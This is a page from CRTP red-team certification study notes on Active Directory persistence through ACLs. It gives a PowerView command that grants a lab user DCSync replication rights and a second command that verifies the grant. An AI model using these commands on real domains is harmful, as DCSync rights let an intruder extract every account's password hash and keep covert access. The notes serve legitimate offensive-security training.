🛠️
CRTP Notes
  • 🛠️CRTP Notes
  • ⚙️CRTP Methodology
  • 💡Misc
    • PowerShell Basics
    • Bypass defenses
    • Transfer files
  • 🔨Basic enumeration
    • General
    • Network
    • Protection
  • ⛏️AD Enumeration
    • Gnereral
    • ACL
    • Forests and Trusts
  • 🔪Privilege Escalation
    • Local Privilege Escalation
    • Domain Privilege Escalation
      • Kerberoast
      • AS-REP Roasting
      • Delegations
    • Cross Domain Privilege Escalation
      • Trusts
      • AD CS
      • MSSQL Servers
  • 🏎️Lateral Movement
    • WinRM
    • Credentials Dumping
    • DC Sync
    • Over Pass The Hash
    • Runas
  • 🔧Persistence
    • Kerberos
      • Golden Ticket
      • Silver Ticket
      • Diamond Ticket
    • Skeleton Key
    • DSRM
    • Custom SSP
    • AdminSDHolder
    • Security Descriptors
    • ACL
  • 🛡️Mitigations
  • 📚Resources
    • AD attacking overall
    • Rubeus Guide
    • The Hacker Recipes
Powered by GitBook
On this page

Was this helpful?

  1. Persistence

ACL

DC Sync

Using PowerView

Add user replication permission:

Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity studentx -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

Check if worked:

Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentx"}

Last updated 7 months ago

Was this helpful?

🔧